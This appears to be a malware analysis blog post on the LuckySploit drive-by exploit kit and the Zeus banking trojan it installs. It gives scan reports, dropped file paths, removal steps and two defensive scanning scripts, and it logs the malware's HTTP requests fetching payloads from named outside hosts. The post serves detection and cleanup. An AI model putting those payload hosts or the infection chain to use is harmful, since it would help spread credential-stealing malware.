LuckySploit – New exploit kit

In the last few days a user submitted a new sample of an exploit kit called LuckySploit. This new exploit kit (similar to the EL.FIESTA Exploit Kit) is a set of .HTML files used to spread malware by drive-by download; the pages are full of obfuscated, malicious JavaScript. A small part of the deobfuscated JS code looks like:

f = "Welcome to LuckySploit:) \n ITS TOASTED";

The user told us that this new LuckySploit kit is spread through hidden iframes, which attackers add to legitimate web pages after compromising the sites. The hidden iframe redirects every visitor to a malicious website that hosts the kit's exploits.
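Site owners can look for this kind of injected frame in their own pages. The scanner below is an added example written for this post (it is not part of LuckySploit or the original author's material); the heuristics, the HiddenIframeFinder class and the sample page are constructed for illustration.

```python
"""Flag <iframe> tags a visitor is not meant to see, the delivery trick described
above. Added example, not code from the post; the sample HTML is constructed."""
import re
from html.parser import HTMLParser

# Heuristics: CSS that hides the frame, a 0/1-pixel box, or an off-screen position.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
OFFSCREEN = re.compile(r"(left|top)\s*:\s*-\d+", re.I)
TINY_SIZE = re.compile(r"^\s*[01]\s*(px)?\s*$", re.I)


class HiddenIframeFinder(HTMLParser):
    """Collects (src, reason) for every iframe matching one of the heuristics."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("style hides element")
        if TINY_SIZE.match(a.get("width", "")) or TINY_SIZE.match(a.get("height", "")):
            reasons.append("zero/one-pixel size")
        if OFFSCREEN.search(a.get("style", "")):
            reasons.append("positioned off-screen")
        if reasons:
            self.findings.append((a.get("src", "<no src>"), "; ".join(reasons)))


def find_hidden_iframes(html_text):
    """Return [(src, reason), ...] for the hidden iframes found in html_text."""
    parser = HiddenIframeFinder()
    parser.feed(html_text)
    parser.close()
    return parser.findings


# Constructed sample: a normal page with one injected, invisible frame appended.
SAMPLE_PAGE = """<html><body>
<h1>Company news</h1>
<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>
<iframe src="http://redirector.invalid/in.php" width="1" height="1"
        style="visibility:hidden" frameborder="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reason in find_hidden_iframes(SAMPLE_PAGE):
        print(f"suspicious iframe: {src} ({reason})")
```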

The downloaded malware was named r.exe; the virus scanner report follows:

Report Generated 2.3.2009 at 20.04.47 (GMT 1)
Filename: r.exe
File size: 67 KB
MD5 Hash: 1ED1D899561E79488132CD59DFD2D3B4
SHA1 Hash: E0D1EE1CD5D0CC0202D1321EF4E89471A4E816E7
CRC32: 640354285
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found*
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 18 on 23

Antivirus Sig Version Result
a-squared 27/02/2009 Virus.Win32.Zbot!IK
Avira AntiVir 7.1.2.94 TR/Spy.ZBot.mtu
Avast 090228-0 Win32:Zbot-AZQ [Trj]
AVG 270.11.5/1979 Crypt.CJL
BitDefender 02/03/2009 Backdoor.Bot.80285
ClamAV 27/02/2009 –
Comodo 986 TrojWare.Win32.Spy.Zbot.~ACB
Dr.Web 02/03/2009 –
Ewido 02/03/2009 –
F-PROT 6 20090302 W32/Trojan3.ACQ
G DATA 19.3559 Trojan-Spy.Win32.Zbot.mtu A
IkarusT3 27/02/2009 Virus.Win32.Zbot
Kaspersky 02/03/2009 Trojan-Spy.Win32.Zbot.mtu
MHR (Malware Hash Registry) 02/03/2009 Virus Found – detect rate 11%
NOD32 v3 3900 Win32/Spy.Zbot.IB
Norman 2009/02/27 Trojan W32/Malware.FKHB
Panda 07/02/2009 –
QuickHeal 02 March, 2009 TrojanSpy.Zbot.mtu
Solo Antivirus 02/03/2009 Trojan.Spy.Win32.Zbot.Mtu
Sophos 02/03/2009 Troj/ZbotPP-Fam
TrendMicro 873(587300) –
VBA32 02/03/2009 Trojan-Spy.Win32.Zbot.myx
VirusBuster 10.101.27 TrojanSpy.Zbot.CXL

The malware was downloaded immediately after we visited the infected web page: Internet Explorer started downloading and executing a number of .EXE files. The malicious .html pages contained encrypted code, and the script uses a sort of RSA encryption function.

The malware created a hidden (+H) folder in system32, known to be the folder used by the infamous -wsnpoem- variant of the Zeus Trojan, which is used to steal bank account details:

C:\WINDOWS\system32\wsnpoem\
C:\WINDOWS\system32\wsnpoem\video.dll
C:\WINDOWS\system32\wsnpoem\audio.dll

Screenshot of hidden folder

The DLL video.dll was injected into another process, winlogon.exe. This is a critical system process that cannot be terminated: killing it crashes the operating system.

Afterwards, it dropped a new file:

C:\Documents and Settings\user\svchost.exe

After some time, more files were dropped in system32:

C:\Program Files\Microsoft Common\wuauclt.exe
C:\WINDOWS\system32\twex.exe
C:\WINDOWS\system32\twain32
C:\WINDOWS\system32\twain32\local.ds
C:\WINDOWS\system32\twain32\user.ds

Report Generated 2.3.2009 at 20.07.00 (GMT 1)
Filename: twex.exe
File size: 146 KB
MD5 Hash: 68E5A477204EB6E8B3DD5B6FC2824C0B
SHA1 Hash: C750CBF0C5D89D0029D5ADB3DA5C3BDD1CF0959A
CRC32: 193841038
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found*
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 13 on 24 (54,16 %)

Antivirus Sig Version Result
a-squared 27/02/2009 –
Avira AntiVir 7.1.2.94 TR/Dropper.Gen
Avast 090228-0 Win32:Zbot-AZQ [Trj]
AVG 270.11.5/1979 Crypt.CJL
BitDefender 02/03/2009 Backdoor.Bot.80285
ClamAV 27/02/2009 –
Comodo 986 –
Dr.Web 02/03/2009 –
Ewido 02/03/2009 –
F-PROT 6 20090302 W32/Trojan3.ACQ
G DATA 19.3559 Win32:Zbot-AZQ [Trj] B
IkarusT3 27/02/2009 –
Kaspersky 02/03/2009 HEUR:Trojan.Win32.Generic
McAfee 03/02/2009 –
MHR (Malware Hash Registry) 02/03/2009 –
NOD32 v3 3900 Win32/Spy.Zbot.IB
Norman 2009/02/27 Trojan W32/Malware.FKHB
Panda 07/02/2009 –
QuickHeal 02 March, 2009 TrojanSpy.Zbot.mtu
Solo Antivirus 02/03/2009 –
Sophos 02/03/2009 Troj/ZbotPP-Fam
TrendMicro 873(587300) –
VBA32 02/03/2009 Trojan-Spy.Win32.Zbot.myx
VirusBuster 10.101.27 TrojanSpy.Zbot.CXL

The following files look like the ZeuS Trojan, which steals personal information and passwords and sends all the data to a malicious server.

C:\WINDOWS\system32\twex.exe
C:\WINDOWS\system32\twain32
C:\WINDOWS\system32\twain32\local.ds
C:\WINDOWS\system32\twain32\user.ds

This is very dangerous: the attackers can steal your credit card or bank account details, empty the accounts, or sell the details to other people.

The file C:\WINDOWS\system32\twex.exe is hidden from Explorer search. The malware also created several registry keys so that it starts every time Windows starts, and it began communicating with external websites to download new malware samples:

GET /r.exe HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.saiprogetti.it
Connection: Keep-Alive
HTTP/1.1 200 OK
 
GET /parus/ HTTP/1.1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rodexcom.org
Connection: Keep-Alive
HTTP/1.1 200 OK

How to remove the -wsnpoem- and twex.exe malware?

1] Boot windows in SafeMode

2] Delete the malicious files

3] Delete the malicious registry keys

4] Scan your system with NoVirusThanks Malware Remover
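Before working through those steps on a suspected machine, it helps to check for the exact artifacts named in this post. The script below is an added example (it is not the original author's tool and not NoVirusThanks Malware Remover); the artifact paths come from the post, while the scan_drive and is_hidden functions and the sample directory tree are constructed for illustration.

```python
# Triage check for the on-disk artifacts listed in this post. Added example, not
# the original author's tool; the sample directory tree below is constructed.
import tempfile
from pathlib import Path

FILE_ATTRIBUTE_HIDDEN = 0x2  # Win32 attribute bit, the +H flag mentioned above

# Paths from the post, relative to the system drive root (C:\ on the infected box).
FIXED_ARTIFACTS = [
    "WINDOWS/system32/wsnpoem",
    "WINDOWS/system32/wsnpoem/video.dll",
    "WINDOWS/system32/wsnpoem/audio.dll",
    "WINDOWS/system32/twex.exe",
    "WINDOWS/system32/twain32",
    "WINDOWS/system32/twain32/local.ds",
    "WINDOWS/system32/twain32/user.ds",
    "Program Files/Microsoft Common/wuauclt.exe",
]
# svchost.exe belongs in system32; a copy inside any user profile is the indicator.
PROFILE_GLOB = "Documents and Settings/*/svchost.exe"


def is_hidden(path):
    """True if the Windows hidden attribute is set; None where the platform does
    not expose file attributes (e.g. a disk image mounted on Linux)."""
    attrs = getattr(path.stat(), "st_file_attributes", None)
    return None if attrs is None else bool(attrs & FILE_ATTRIBUTE_HIDDEN)


def scan_drive(root):
    """Return sorted (relative_path, hidden) pairs for every artifact present."""
    root = Path(root)
    found = {rel: is_hidden(root / rel) for rel in FIXED_ARTIFACTS if (root / rel).exists()}
    for p in root.glob(PROFILE_GLOB):
        found[p.relative_to(root).as_posix()] = is_hidden(p)
    return sorted(found.items())


def build_sample_tree():
    """Constructed stand-in for an infected drive holding a subset of the artifacts."""
    root = Path(tempfile.mkdtemp(prefix="luckysploit_"))
    for rel in ("WINDOWS/system32/wsnpoem/video.dll", "WINDOWS/system32/twex.exe",
                "Documents and Settings/user/svchost.exe",
                "WINDOWS/system32/svchost.exe"):  # legitimate copy, must not be flagged
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(b"")
    return root


if __name__ == "__main__":
    for rel, hidden in scan_drive(build_sample_tree()):
        print(f"{rel}  hidden={hidden}")
```

Point scan_drive at the mounted system drive of the suspect machine (or a disk image) rather than at the sample tree; on Windows the hidden flag is reported, elsewhere it comes back as None.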
